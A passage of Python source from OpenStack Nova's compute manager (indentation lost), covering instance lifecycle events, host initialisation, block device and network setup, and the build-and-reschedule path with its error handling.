pending_hard = (current_task_state == task_states.REBOOT_PENDING_HARD
and instance.vm_state in vm_states.ALLOW_HARD_REBOOT)
started_not_running = (current_task_state in
[task_states.REBOOT_STARTED,
task_states.REBOOT_STARTED_HARD] and
current_power_state != power_state.RUNNING)
if pending_soft or pending_hard or started_not_running:
retry_reboot = True
return retry_reboot, reboot_type
def handle_lifecycle_event(self, event):
LOG.info("VM %(state)s (Lifecycle Event)",
{'state': event.get_name()},
instance_uuid=event.get_instance_uuid())
context = nova.context.get_admin_context(read_deleted='yes')
instance = objects.Instance.get_by_uuid(context,
event.get_instance_uuid(),
expected_attrs=[])
vm_power_state = None
if event.get_transition() == virtevent.EVENT_LIFECYCLE_STOPPED:
vm_power_state = power_state.SHUTDOWN
elif event.get_transition() == virtevent.EVENT_LIFECYCLE_STARTED:
vm_power_state = power_state.RUNNING
elif event.get_transition() == virtevent.EVENT_LIFECYCLE_PAUSED:
vm_power_state = power_state.PAUSED
elif event.get_transition() == virtevent.EVENT_LIFECYCLE_RESUMED:
vm_power_state = power_state.RUNNING
elif event.get_transition() == virtevent.EVENT_LIFECYCLE_SUSPENDED:
vm_power_state = power_state.SUSPENDED
else:
LOG.warning("Unexpected power state %d", event.get_transition())
# Note(lpetrut): The event may be delayed, thus not reflecting
# the current instance power state. In that case, ignore the event.
current_power_state = self._get_power_state(context, instance)
if current_power_state == vm_power_state:
LOG.debug('Synchronizing instance power state after lifecycle '
'event "%(event)s"; current vm_state: %(vm_state)s, '
'current task_state: %(task_state)s, current DB '
'power_state: %(db_power_state)s, VM power_state: '
'%(vm_power_state)s',
{'event': event.get_name(),
'vm_state': instance.vm_state,
'task_state': instance.task_state,
'db_power_state': instance.power_state,
'vm_power_state': vm_power_state},
instance_uuid=instance.uuid)
self._sync_instance_power_state(context,
instance,
vm_power_state)
def handle_events(self, event):
if isinstance(event, virtevent.LifecycleEvent):
try:
self.handle_lifecycle_event(event)
except exception.InstanceNotFound:
LOG.debug("Event %s arrived for non-existent instance. The "
"instance was probably deleted.", event)
else:
LOG.debug("Ignoring event %s", event)
def init_virt_events(self):
if CONF.workarounds.handle_virt_lifecycle_events:
self.driver.register_event_listener(self.handle_events)
else:
# NOTE(mriedem): If the _sync_power_states periodic task is
# disabled we should emit a warning in the logs.
if CONF.sync_power_state_interval < 0:
LOG.warning('Instance lifecycle events from the compute '
'driver have been disabled. Note that lifecycle '
'changes to an instance outside of the compute '
'service will not be synchronized '
'automatically since the _sync_power_states '
'periodic task is also disabled.')
else:
LOG.info('Instance lifecycle events from the compute '
'driver have been disabled. Note that lifecycle '
'changes to an instance outside of the compute '
'service will only be synchronized by the '
'_sync_power_states periodic task.')
def init_host(self):
"""Initialization for a standalone compute service."""
if CONF.pci.passthrough_whitelist:
# Simply loading the PCI passthrough whitelist will do a bunch of
# validation that would otherwise wait until the PciDevTracker is
# constructed when updating available resources for the compute
# node(s) in the resource tracker, effectively killing that task.
# So load up the whitelist when starting the compute service to
# flush any invalid configuration early so we can kill the service
# if the configuration is wrong.
whitelist.Whitelist(CONF.pci.passthrough_whitelist)
# NOTE(sbauza): We want the compute node to hard fail if it won't be
# able to provide its resources to the placement API, or it will not
# be able to be eligible as a destination.
if CONF.placement.region_name is None:
raise exception.PlacementNotConfigured()
self.driver.init_host(host=self.host)
context = nova.context.get_admin_context()
instances = objects.InstanceList.get_by_host(
context, self.host, expected_attrs=['info_cache', 'metadata'])
if CONF.defer_iptables_apply:
self.driver.filter_defer_apply_on()
self.init_virt_events()
try:
# checking that instance was not already evacuated to other host
self._destroy_evacuated_instances(context)
for instance in instances:
self._init_instance(context, instance)
finally:
if CONF.defer_iptables_apply:
self.driver.filter_defer_apply_off()
if instances:
# We only send the instance info to the scheduler on startup
# if there is anything to send, otherwise this host might
# not be mapped yet in a cell and the scheduler may have
# issues dealing with the information. Later changes to
# instances on this host will update the scheduler, or the
# _sync_scheduler_instance_info periodic task will.
self._update_scheduler_instance_info(context, instances)
def cleanup_host(self):
if self.instance_running_pool.running() > 0:
self.instance_running_pool.waitall()
self.driver.register_event_listener(None)
self.instance_events.cancel_all_events()
self.driver.cleanup_host(host=self.host)
def pre_start_hook(self):
"""After the service is initialized, but before we fully bring
the service up by listening on RPC queues, make sure to update
our available resources (and indirectly our available nodes).
"""
self.update_available_resource(nova.context.get_admin_context(),
startup=True)
def _get_power_state(self, context, instance):
"""Retrieve the power state for the given instance."""
LOG.debug('Checking state', instance=instance)
try:
return self.driver.get_info(instance).state
except exception.InstanceNotFound:
return power_state.NOSTATE
def get_console_topic(self, context):
"""Retrieves the console host for a project on this host.
Currently this is just set in the flags for each compute host.
"""
# TODO(mdragon): perhaps make this variable by console_type?
return '%s.%s' % (console_rpcapi.RPC_TOPIC, CONF.console_host)
@wrap_exception()
def get_console_pool_info(self, context, console_type):
return self.driver.get_console_pool_info(console_type)
@wrap_exception()
def refresh_instance_security_rules(self, context, instance):
"""Tell the virtualization driver to refresh security rules for
an instance.
Passes straight through to the virtualization driver.
Synchronize the call because we may still be in the middle of
creating the instance.
"""
@utils.synchronized(instance.uuid)
def _sync_refresh():
try:
return self.driver.refresh_instance_security_rules(instance)
except NotImplementedError:
LOG.debug('Hypervisor driver does not support '
'security groups.', instance=instance)
return _sync_refresh()
def _await_block_device_map_created(self, context, vol_id):
# TODO(yamahata): creating volume simultaneously
# reduces creation time?
# TODO(yamahata): eliminate dumb polling
start = time.time()
retries = CONF.block_device_allocate_retries
if retries < 0:
LOG.warning("Treating negative config value (%(retries)s) for "
"'block_device_retries' as 0.",
{'retries': retries})
# (1) treat negative config value as 0
# (2) the configured value is 0, one attempt should be made
# (3) the configured value is > 0, then the total number attempts
# is (retries + 1)
attempts = 1
if retries >= 1:
attempts = retries + 1
for attempt in range(1, attempts + 1):
volume = self.volume_api.get(context, vol_id)
volume_status = volume['status']
if volume_status not in ['creating', 'downloading']:
if volume_status == 'available':
return attempt
LOG.warning("Volume id: %(vol_id)s finished being "
"created but its status is %(vol_status)s.",
{'vol_id': vol_id,
'vol_status': volume_status})
break
greenthread.sleep(CONF.block_device_allocate_retries_interval)
raise exception.VolumeNotCreated(volume_id=vol_id,
seconds=int(time.time() - start),
attempts=attempt,
volume_status=volume_status)
def _decode_files(self, injected_files):
"""Base64 decode the list of files to inject."""
if not injected_files:
return []
def _decode(f):
path, contents = f
# Py3 raises binascii.Error instead of TypeError as in Py27
try:
decoded = base64.b64decode(contents)
return path, decoded
except (TypeError, binascii.Error):
raise exception.Base64Exception(path=path)
return [_decode(f) for f in injected_files]
def _validate_instance_group_policy(self, context, instance,
scheduler_hints):
# NOTE(russellb) Instance group policy is enforced by the scheduler.
# However, there is a race condition with the enforcement of
# the policy. Since more than one instance may be scheduled at the
# same time, it's possible that more than one instance with an
# anti-affinity policy may end up here. It's also possible that
# multiple instances with an affinity policy could end up on different
# hosts. This is a validation step to make sure that starting the
# instance here doesn't violate the policy.
group_hint = scheduler_hints.get('group')
if not group_hint:
return
# The RequestSpec stores scheduler_hints as key=list pairs so we need
# to check the type on the value and pull the single entry out. The
# API request schema validates that the 'group' hint is a single value.
if isinstance(group_hint, list):
group_hint = group_hint[0]
@utils.synchronized(group_hint)
def _do_validation(context, instance, group_hint):
group = objects.InstanceGroup.get_by_hint(context, group_hint)
if 'anti-affinity' in group.policies:
group_hosts = group.get_hosts(exclude=[instance.uuid])
resource_scheduling = self.driver.capabilities.get(
"resource_scheduling", False)
if self.host in group_hosts and not resource_scheduling:
msg = _("Anti-affinity instance group policy "
"was violated.")
raise exception.RescheduledException(
instance_uuid=instance.uuid,
reason=msg)
elif 'affinity' in group.policies:
group_hosts = group.get_hosts(exclude=[instance.uuid])
if group_hosts and self.host not in group_hosts:
msg = _("Affinity instance group policy was violated.")
raise exception.RescheduledException(
instance_uuid=instance.uuid,
reason=msg)
if not CONF.workarounds.disable_group_policy_check_upcall:
_do_validation(context, instance, group_hint)
def _log_original_error(self, exc_info, instance_uuid):
LOG.error('Error: %s', exc_info[1], instance_uuid=instance_uuid,
exc_info=exc_info)
def _reschedule(self, context, request_spec, filter_properties,
instance, reschedule_method, method_args, task_state,
exc_info=None, host_list=None):
"""Attempt to re-schedule a compute operation."""
instance_uuid = instance.uuid
retry = filter_properties.get('retry')
if not retry:
# no retry information, do not reschedule.
LOG.debug("Retry info not present, will not reschedule",
instance_uuid=instance_uuid)
return
if not request_spec:
LOG.debug("No request spec, will not reschedule",
instance_uuid=instance_uuid)
return
LOG.debug("Re-scheduling %(method)s: attempt %(num)d",
{'method': reschedule_method.__name__,
'num': retry['num_attempts']}, instance_uuid=instance_uuid)
# reset the task state:
self._instance_update(context, instance, task_state=task_state)
if exc_info:
# stringify to avoid circular ref problem in json serialization:
retry['exc'] = traceback.format_exception_only(exc_info[0],
exc_info[1])
reschedule_method(context, *method_args, host_list=host_list)
return True
@periodic_task.periodic_task
def _check_instance_build_time(self, context):
"""Ensure that instances are not stuck in build."""
timeout = CONF.instance_build_timeout
if timeout == 0:
return
filters = {'vm_state': vm_states.BUILDING,
'host': self.host}
building_insts = objects.InstanceList.get_by_filters(context,
filters, expected_attrs=[], use_slave=True)
for instance in building_insts:
if timeutils.is_older_than(instance.created_at, timeout):
self._set_instance_obj_error_state(context, instance)
LOG.warning("Instance build timed out. Set to error "
"state.", instance=instance)
def _check_instance_exists(self, context, instance):
"""Ensure an instance with the same name is not already present."""
if self.driver.instance_exists(instance):
raise exception.InstanceExists(name=instance.name)
def _allocate_network_async(self, context, instance, requested_networks,
macs, security_groups, is_vpn):
"""Method used to allocate networks in the background.
Broken out for testing.
"""
# First check to see if we're specifically not supposed to allocate
# networks because if so, we can exit early.
if requested_networks and requested_networks.no_allocate:
LOG.debug("Not allocating networking since 'none' was specified.",
instance=instance)
return network_model.NetworkInfo([])
LOG.debug("Allocating IP information in the background.",
instance=instance)
retries = CONF.network_allocate_retries
attempts = retries + 1
retry_time = 1
bind_host_id = self.driver.network_binding_host_id(context, instance)
for attempt in range(1, attempts + 1):
try:
nwinfo = self.network_api.allocate_for_instance(
context, instance, vpn=is_vpn,
requested_networks=requested_networks,
macs=macs,
security_groups=security_groups,
bind_host_id=bind_host_id)
LOG.debug('Instance network_info: |%s|', nwinfo,
instance=instance)
instance.system_metadata['network_allocated'] = 'True'
# NOTE(JoshNang) do not save the instance here, as it can cause
# races. The caller shares a reference to instance and waits
# for this async greenthread to finish before calling
# instance.save().
return nwinfo
except Exception:
exc_info = sys.exc_info()
log_info = {'attempt': attempt,
'attempts': attempts}
if attempt == attempts:
LOG.exception('Instance failed network setup '
'after %(attempts)d attempt(s)',
log_info)
six.reraise(*exc_info)
LOG.warning('Instance failed network setup '
'(attempt %(attempt)d of %(attempts)d)',
log_info, instance=instance)
time.sleep(retry_time)
retry_time *= 2
if retry_time > 30:
retry_time = 30
# Not reached.
def _build_networks_for_instance(self, context, instance,
requested_networks, security_groups):
# If we're here from a reschedule the network may already be allocated.
if strutils.bool_from_string(
instance.system_metadata.get('network_allocated', 'False')):
# NOTE(alex_xu): The network_allocated is True means the network
# resource already allocated at previous scheduling, and the
# network setup is cleanup at previous. After rescheduling, the
# network resource need setup on the new host.
self.network_api.setup_instance_network_on_host(
context, instance, instance.host)
return self.network_api.get_instance_nw_info(context, instance)
if not self.is_neutron_security_groups:
security_groups = []
macs = self.driver.macs_for_instance(instance)
network_info = self._allocate_network(context, instance,
requested_networks, macs, security_groups)
return network_info
def _allocate_network(self, context, instance, requested_networks, macs,
security_groups):
"""Start network allocation asynchronously. Return an instance
of NetworkInfoAsyncWrapper that can be used to retrieve the
allocated networks when the operation has finished.
"""
# NOTE(comstud): Since we're allocating networks asynchronously,
# this task state has little meaning, as we won't be in this
# state for very long.
instance.vm_state = vm_states.BUILDING
instance.task_state = task_states.NETWORKING
instance.save(expected_task_state=[None])
is_vpn = False
return network_model.NetworkInfoAsyncWrapper(
self._allocate_network_async, context, instance,
requested_networks, macs, security_groups, is_vpn)
def _default_root_device_name(self, instance, image_meta, root_bdm):
try:
return self.driver.default_root_device_name(instance,
image_meta,
root_bdm)
except NotImplementedError:
return compute_utils.get_next_device_name(instance, [])
def _default_device_names_for_instance(self, instance,
root_device_name,
*block_device_lists):
try:
self.driver.default_device_names_for_instance(instance,
root_device_name,
*block_device_lists)
except NotImplementedError:
compute_utils.default_device_names_for_instance(
instance, root_device_name, *block_device_lists)
def _get_device_name_for_instance(self, instance, bdms, block_device_obj):
# NOTE(ndipanov): Copy obj to avoid changing the original
block_device_obj = block_device_obj.obj_clone()
try:
return self.driver.get_device_name_for_instance(
instance, bdms, block_device_obj)
except NotImplementedError:
return compute_utils.get_device_name_for_instance(
instance, bdms, block_device_obj.get("device_name"))
def _default_block_device_names(self, instance, image_meta, block_devices):
"""Verify that all the devices have the device_name set. If not,
provide a default name.
It also ensures that there is a root_device_name and is set to the
first block device in the boot sequence (boot_index=0).
"""
root_bdm = block_device.get_root_bdm(block_devices)
if not root_bdm:
return
# Get the root_device_name from the root BDM or the instance
root_device_name = None
update_root_bdm = False
if root_bdm.device_name:
root_device_name = root_bdm.device_name
instance.root_device_name = root_device_name
elif instance.root_device_name:
root_device_name = instance.root_device_name
root_bdm.device_name = root_device_name
update_root_bdm = True
else:
root_device_name = self._default_root_device_name(instance,
image_meta,
root_bdm)
instance.root_device_name = root_device_name
root_bdm.device_name = root_device_name
update_root_bdm = True
if update_root_bdm:
root_bdm.save()
ephemerals = list(filter(block_device.new_format_is_ephemeral,
block_devices))
swap = list(filter(block_device.new_format_is_swap,
block_devices))
block_device_mapping = list(filter(
driver_block_device.is_block_device_mapping, block_devices))
self._default_device_names_for_instance(instance,
root_device_name,
ephemerals,
swap,
block_device_mapping)
def _block_device_info_to_legacy(self, block_device_info):
"""Convert BDI to the old format for drivers that need it."""
if self.use_legacy_block_device_info:
ephemerals = driver_block_device.legacy_block_devices(
driver.block_device_info_get_ephemerals(block_device_info))
mapping = driver_block_device.legacy_block_devices(
driver.block_device_info_get_mapping(block_device_info))
swap = block_device_info['swap']
if swap:
swap = swap.legacy()
block_device_info.update({
'ephemerals': ephemerals,
'swap': swap,
'block_device_mapping': mapping})
def _add_missing_dev_names(self, bdms, instance):
for bdm in bdms:
if bdm.device_name is not None:
continue
device_name = self._get_device_name_for_instance(instance,
bdms, bdm)
values = {'device_name': device_name}
bdm.update(values)
bdm.save()
def _prep_block_device(self, context, instance, bdms):
"""Set up the block device for an instance with error logging."""
try:
self._add_missing_dev_names(bdms, instance)
block_device_info = driver.get_block_device_info(instance, bdms)
mapping = driver.block_device_info_get_mapping(block_device_info)
driver_block_device.attach_block_devices(
mapping, context, instance, self.volume_api, self.driver,
wait_func=self._await_block_device_map_created)
self._block_device_info_to_legacy(block_device_info)
return block_device_info
except exception.OverQuota as e:
LOG.warning('Failed to create block device for instance due'
' to exceeding volume related resource quota.'
' Error: %s', e.message, instance=instance)
raise
except Exception as ex:
LOG.exception('Instance failed block device setup',
instance=instance)
# InvalidBDM will eventually result in a BuildAbortException when
# booting from volume, and will be recorded as an instance fault.
# Maintain the original exception message which most likely has
# useful details which the standard InvalidBDM error message lacks.
raise exception.InvalidBDM(six.text_type(ex))
def _update_instance_after_spawn(self, context, instance):
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
instance.launched_at = timeutils.utcnow()
configdrive.update_instance(instance)
def _update_scheduler_instance_info(self, context, instance):
"""Sends an InstanceList with created or updated Instance objects to
the Scheduler client.
In the case of init_host, the value passed will already be an
InstanceList. Other calls will send individual Instance objects that
have been created or resized. In this case, we create an InstanceList
object containing that Instance.
"""
if not self.send_instance_updates:
return
if isinstance(instance, obj_instance.Instance):
instance = objects.InstanceList(objects=[instance])
context = context.elevated()
self.scheduler_client.update_instance_info(context, self.host,
instance)
def _delete_scheduler_instance_info(self, context, instance_uuid):
"""Sends the uuid of the deleted Instance to the Scheduler client."""
if not self.send_instance_updates:
return
context = context.elevated()
self.scheduler_client.delete_instance_info(context, self.host,
instance_uuid)
@periodic_task.periodic_task(spacing=CONF.scheduler_instance_sync_interval)
def _sync_scheduler_instance_info(self, context):
if not self.send_instance_updates:
return
context = context.elevated()
instances = objects.InstanceList.get_by_host(context, self.host,
expected_attrs=[],
use_slave=True)
uuids = [instance.uuid for instance in instances]
self.scheduler_client.sync_instance_info(context, self.host, uuids)
def _notify_about_instance_usage(self, context, instance, event_suffix,
network_info=None, system_metadata=None,
extra_usage_info=None, fault=None):
compute_utils.notify_about_instance_usage(
self.notifier, context, instance, event_suffix,
network_info=network_info,
system_metadata=system_metadata,
extra_usage_info=extra_usage_info, fault=fault)
def _deallocate_network(self, context, instance,
requested_networks=None):
# If we were told not to allocate networks let's save ourselves
# the trouble of calling the network API.
if requested_networks and requested_networks.no_allocate:
LOG.debug("Skipping network deallocation for instance since "
"networking was not requested.", instance=instance)
return
LOG.debug('Deallocating network for instance', instance=instance)
with timeutils.StopWatch() as timer:
self.network_api.deallocate_for_instance(
context, instance, requested_networks=requested_networks)
# nova-network does an rpc call so we're OK tracking time spent here
LOG.info('Took %0.2f seconds to deallocate network for instance.',
timer.elapsed(), instance=instance)
def _get_instance_block_device_info(self, context, instance,
refresh_conn_info=False,
bdms=None):
"""Transform block devices to the driver block_device format."""
if not bdms:
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
block_device_info = driver.get_block_device_info(instance, bdms)
if not refresh_conn_info:
# if the block_device_mapping has no value in connection_info
# (returned as None), don't include in the mapping
block_device_info['block_device_mapping'] = [
bdm for bdm in driver.block_device_info_get_mapping(
block_device_info)
if bdm.get('connection_info')]
else:
driver_block_device.refresh_conn_infos(
driver.block_device_info_get_mapping(block_device_info),
context, instance, self.volume_api, self.driver)
self._block_device_info_to_legacy(block_device_info)
return block_device_info
def _build_failed(self, node):
if CONF.compute.consecutive_build_service_disable_threshold:
rt = self._get_resource_tracker()
# NOTE(danms): Update our counter, but wait for the next
# update_available_resource() periodic to flush it to the DB
rt.build_failed(node)
def _build_succeeded(self, node):
rt = self._get_resource_tracker()
rt.build_succeeded(node)
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def build_and_run_instance(self, context, instance, image, request_spec,
filter_properties, admin_password=None,
injected_files=None, requested_networks=None,
security_groups=None, block_device_mapping=None,
node=None, limits=None, host_list=None):
@utils.synchronized(instance.uuid)
def _locked_do_build_and_run_instance(*args, **kwargs):
# NOTE(danms): We grab the semaphore with the instance uuid
# locked because we could wait in line to build this instance
# for a while and we want to make sure that nothing else tries
# to do anything with this instance while we wait.
with self._per_project_build_semaphore.get(instance.project_id):
with self._build_semaphore:
try:
result = self._do_build_and_run_instance(*args,
**kwargs)
except Exception:
# NOTE(mriedem): This should really only happen if
# _decode_files in _do_build_and_run_instance fails,
# and that's before a guest is spawned so it's OK to
# remove allocations for the instance for this node
# from Placement below as there is no guest consuming
# resources anyway. The _decode_files case could be
# handled more specifically but that's left for
# another day.
result = build_results.FAILED
raise
finally:
if result == build_results.FAILED:
# Remove the allocation records from Placement for
# the instance if the build failed. The instance.
# host islikely set to None in
# _do_build_and_run_instance
# which means if the user deletes the instance, it
# will be deleted in the API, not the compute
# service. Setting the instance.host to None in
# _do_build_and_run_instance means that the
# ResourceTracker will no longer consider this
# instance to be claiming resources against it,
# so we want to reflect that same thing in
# Placement. No need to call this for a
# reschedule, as the allocations will have already
# been removed in
# self._do_build_and_run_instance().
self._delete_allocation_for_instance(context,
instance.uuid)
if result in (build_results.FAILED,
build_results.RESCHEDULED):
self._build_failed(node)
else:
self._build_succeeded(node)
# NOTE(danms): We spawn here to return the RPC worker thread back to
# the pool. Since what follows could take a really long time, we don't
# want to tie up RPC workers.
self.instance_running_pool.spawn_n(_locked_do_build_and_run_instance,
context, instance, image, request_spec,
filter_properties, admin_password, injected_files,
requested_networks, security_groups,
block_device_mapping, node, limits, host_list)
def _delete_allocation_for_instance(self, context, instance_uuid):
rt = self._get_resource_tracker()
rt.reportclient.delete_allocation_for_instance(context, instance_uuid)
def _check_device_tagging(self, requested_networks, block_device_mapping):
tagging_requested = False
if requested_networks:
for net in requested_networks:
if 'tag' in net and net.tag is not None:
tagging_requested = True
break
if block_device_mapping and not tagging_requested:
for bdm in block_device_mapping:
if 'tag' in bdm and bdm.tag is not None:
tagging_requested = True
break
if (tagging_requested and
not self.driver.capabilities.get('supports_device_tagging')):
raise exception.BuildAbortException('Attempt to boot guest with '
'tagged devices on host that '
'does not support tagging.')
@hooks.add_hook('build_instance')
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def _do_build_and_run_instance(self, context, instance, image,
request_spec, filter_properties, admin_password, injected_files,
requested_networks, security_groups, block_device_mapping,
node=None, limits=None, host_list=None):
try:
LOG.debug('Starting instance...', instance=instance)
instance.vm_state = vm_states.BUILDING
instance.task_state = None
instance.save(expected_task_state=
(task_states.SCHEDULING, None))
except exception.InstanceNotFound:
msg = 'Instance disappeared before build.'
LOG.debug(msg, instance=instance)
return build_results.FAILED
except exception.UnexpectedTaskStateError as e:
LOG.debug(e.format_message(), instance=instance)
return build_results.FAILED
# b64 decode the files to inject:
decoded_files = self._decode_files(injected_files)
if limits is None:
limits = {}
if node is None:
node = self._get_nodename(instance, refresh=True)
try:
with timeutils.StopWatch() as timer:
self._build_and_run_instance(context, instance, image,
decoded_files, admin_password, requested_networks,
security_groups, block_device_mapping, node, limits,
filter_properties, request_spec)
LOG.info('Took %0.2f seconds to build instance.',
timer.elapsed(), instance=instance)
return build_results.ACTIVE
except exception.RescheduledException as e:
retry = filter_properties.get('retry')
if not retry:
# no retry information, do not reschedule.
LOG.debug("Retry info not present, will not reschedule",
instance=instance)
self._cleanup_allocated_networks(context, instance,
requested_networks)
self._cleanup_volumes(context, instance,
block_device_mapping, raise_exc=False)
compute_utils.add_instance_fault_from_exc(context,
instance, e, sys.exc_info(),
fault_message=e.kwargs['reason'])
self._nil_out_instance_obj_host_and_node(instance)
self._set_instance_obj_error_state(context, instance,
clean_task_state=True)
return build_results.FAILED
LOG.debug(e.format_message(), instance=instance)
# This will be used for logging the exception
retry['exc'] = traceback.format_exception(*sys.exc_info())
# This will be used for setting the instance fault message
retry['exc_reason'] = e.kwargs['reason']
# NOTE(comstud): Deallocate networks if the driver wants
# us to do so.
# NOTE(mriedem): Always deallocate networking when using Neutron.
# This is to unbind any ports that the user supplied in the server
# create request, or delete any ports that nova created which were
# meant to be bound to this host. This check intentionally bypasses
# the result of deallocate_networks_on_reschedule because the
# default value in the driver is False, but that method was really
# only meant for Ironic and should be removed when nova-network is
# removed (since is_neutron() will then always be True).
# NOTE(vladikr): SR-IOV ports should be deallocated to
# allow new sriov pci devices to be allocated on a new host.
# Otherwise, if devices with pci addresses are already allocated
# on the destination host, the instance will fail to spawn.
# info_cache.network_info should be present at this stage.
if (self.driver.deallocate_networks_on_reschedule(instance) or
utils.is_neutron() or
self.deallocate_sriov_ports_on_reschedule(instance)):
self._cleanup_allocated_networks(context, instance,
requested_networks)
else:
# NOTE(alex_xu): Network already allocated and we don't
# want to deallocate them before rescheduling. But we need
# to cleanup those network resources setup on this host before
# rescheduling.
self.network_api.cleanup_instance_network_on_host(
context, instance, self.host)
self._nil_out_instance_obj_host_and_node(instance)
instance.task_state = task_states.SCHEDULING
instance.save()
# The instance will have already claimed resources from this host
# before this build was attempted. Now that it has failed, we need
# to unclaim those resources before casting to the conductor, so
# that if there are alternate hosts available for a retry, it can
# claim resources on that new host for the instance.
self._delete_allocation_for_instance(context, instance.uuid)
self.compute_task_api.build_instances(context, [instance],
image, filter_properties, admin_password,
injected_files, requested_networks, security_groups,
block_device_mapping, request_spec=request_spec,
host_lists=[host_list])
return build_results.RESCHEDULED
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError):
msg = 'Instance disappeared during build.'
LOG.debug(msg, instance=instance)
self._cleanup_allocated_networks(context, instance,
requested_networks)
return build_results.FAILED
except exception.BuildAbortException as e:
LOG.exception(e.format_message(), instance=instance)
self._cleanup_allocated_networks(context, instance,
requested_networks)
self._cleanup_volumes(context, instance,
block_device_mapping, raise_exc=False)
compute_utils.add_instance_fault_from_exc(context, instance,
e, sys.exc_info())
self._nil_out_instance_obj_host_and_node(instance)
self._set_instance_obj_error_state(context, instance,
clean_task_state=True)
return build_results.FAILED
except Exception as e:
# Should not reach here.
LOG.exception('Unexpected build failure, not rescheduling build.',
instance=instance)
self._cleanup_allocated_networks(context, instance,
requested_networks)
self._cleanup_volumes(context, instance,
block_device_mapping, raise_exc=False)
compute_utils.add_instance_fault_from_exc(context, instance,
e, sys.exc_info())
self._nil_out_instance_obj_host_and_node(instance)
self._set_instance_obj_error_state(context, instance,
clean_task_state=True)
return build_results.FAILED
def deallocate_sriov_ports_on_reschedule(self, instance):
"""Determine if networks are needed to be deallocated before reschedule
Check the cached network info for any assigned SR-IOV ports.
SR-IOV ports should be deallocated prior to rescheduling
in order to allow new sriov pci devices to be allocated on a new host.
"""
info_cache = instance.info_cache
def _has_sriov_port(vif):
return vif['vnic_type'] in network_model.VNIC_TYPES_SRIOV
if (info_cache and info_cache.network_info):
for vif in info_cache.network_info:
if _has_sriov_port(vif):
return True
return False
@staticmethod
def _get_scheduler_hints(filter_properties, request_spec=None):
"""Helper method to get scheduler hints.
This method prefers to get the hints out of the request spec, but that
might not be provided. Conductor will pass request_spec down to the
first compute chosen for a build but older computes will not pass
the request_spec to conductor's build_instances method for a
a reschedule, so if we're on a host via a retry, request_spec may not
be provided so we need to fallback to use the filter_properties
to get scheduler hints.
"""
hints = {}
if request_spec is not None and 'scheduler_hints' in request_spec:
hints = request_spec.scheduler_hints
if not hints:
hints = filter_properties.get('scheduler_hints') or {}
return hints
def _build_and_run_instance(self, context, instance, image, injected_files,
admin_password, requested_networks, security_groups,
block_device_mapping, node, limits, filter_properties,
request_spec=None):
image_name = image.get('name')
self._notify_about_instance_usage(context, instance, 'create.start',
extra_usage_info={'image_name': image_name})
compute_utils.notify_about_instance_create(
context, instance, self.host,
phase=fields.NotificationPhase.START,
bdms=block_device_mapping)
# NOTE(mikal): cache the keystone roles associated with the instance
# at boot time for later reference
instance.system_metadata.update(
{'boot_roles': ','.join(context.roles)[:255]})
self._check_device_tagging(requested_networks, block_device_mapping)
try:
scheduler_hints = self._get_scheduler_hints(filter_properties,
request_spec)
rt = self._get_resource_tracker()
with rt.instance_claim(context, instance, node, limits):
# NOTE(russellb) It's important that this validation be done
# *after* the resource tracker instance claim, as that is where
# the host is set on the instance.
self._validate_instance_group_policy(context, instance,
scheduler_hints)
image_meta = objects.ImageMeta.from_dict(image)
with self._build_resources(context, instance,
requested_networks, security_groups, image_meta,
block_device_mapping) as resources:
instance.vm_state = vm_states.BUILDING
instance.task_state = task_states.SPAWNING
# NOTE(JoshNang) This also saves the changes to the
# instance from _allocate_network_async, as they aren't
# saved in that function to prevent races.
instance.save(expected_task_state=
task_states.BLOCK_DEVICE_MAPPING)
block_device_info = resources['block_device_info']
network_info = resources['network_info']
allocs = resources['allocations']
LOG.debug('Start spawning the instance on the hypervisor.',
instance=instance)
with timeutils.StopWatch() as timer:
self.driver.spawn(context, instance, image_meta,
injected_files, admin_password,
allocs, network_info=network_info,
block_device_info=block_device_info)
LOG.info('Took %0.2f seconds to spawn the instance on '
'the hypervisor.', timer.elapsed(),
instance=instance)
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError) as e:
with excutils.save_and_reraise_exception():
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
compute_utils.notify_about_instance_create(
context, instance, self.host,
phase=fields.NotificationPhase.ERROR, exception=e,
bdms=block_device_mapping)
except exception.ComputeResourcesUnavailable as e:
LOG.debug(e.format_message(), instance=instance)
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
compute_utils.notify_about_instance_create(
context, instance, self.host,
phase=fields.NotificationPhase.ERROR, exception=e,
bdms=block_device_mapping)
raise exception.RescheduledException(
instance_uuid=instance.uuid, reason=e.format_message())
except exception.BuildAbortException as e:
with excutils.save_and_reraise_exception():
LOG.debug(e.format_message(), instance=instance)
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
compute_utils.notify_about_instance_create(
context, instance, self.host,
phase=fields.NotificationPhase.ERROR, exception=e,
bdms=block_device_mapping)
except (exception.FixedIpLimitExceeded,
exception.NoMoreNetworks, exception.NoMoreFixedIps) as e:
LOG.warning('No more network or fixed IP to be allocated',
instance=instance)
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
compute_utils.notify_about_instance_create(
context, instance, self.host,
phase=fields.NotificationPhase.ERROR, exception=e,
bdms=block_device_mapping)
msg = _('Failed to allocate the network(s) with error %s, '
'not rescheduling.') % e.format_message()
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=msg)
except (exception.VirtualInterfaceCreateException,
exception.VirtualInterfaceMacAddressException,
exception.FixedIpInvalidOnHost,
exception.UnableToAutoAllocateNetwork) as e:
LOG.exception('Failed to allocate network(s)',
instance=instance)
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
compute_utils.notify_about_instance_create(
context, instance, self.host,
phase=fields.NotificationPhase.ERROR, exception=e,
bdms=block_device_mapping)
msg = _('Failed to allocate the network(s), not rescheduling.')
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=msg)
except (exception.FlavorDiskTooSmall,
exception.FlavorMemoryTooSmall,
exception.ImageNotActive,
exception.ImageUnacceptable,
exception.InvalidDiskInfo,
exception.InvalidDiskFormat,
cursive_exception.SignatureVerificationError,
exception.VolumeEncryptionNotSupported,
exception.InvalidInput,
# TODO(mriedem): We should be validating RequestedVRamTooHigh
# in the API during server create and rebuild.
exception.RequestedVRamTooHigh) as e:
